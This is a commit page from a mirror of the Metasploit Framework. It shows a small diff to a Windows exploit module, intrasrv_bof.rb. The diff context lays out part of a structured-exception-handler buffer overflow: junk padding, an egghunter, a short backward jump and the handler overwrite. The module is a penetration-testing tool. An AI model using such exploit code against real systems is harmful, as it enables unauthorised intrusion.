infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Additional cleanup

bug/bundler_fix
Nathan Einwechter 2013-08-12 18:20:03 -04:00
parent 7014322dfd
commit 49bcec5c92
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/exploits/windows/http/intrasrv_bof.rb
View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Payload' =>
{
'Space' => '4660',
'Space' => 4660,
'StackAdjustment' => -3500,
'BadChars' => "\x00"
},
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
buf << hunter # egghunter
buf << rand_text(target['Offset']-buf.length) # more junk to offset
buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
buf << "\xeb\x80" + rand_text(2) # nseh - jmp -128 to egghunter
buf << [target.ret].pack("V*") # seh
# second last byte of payload/egg gets corrupted - pad 2 bytes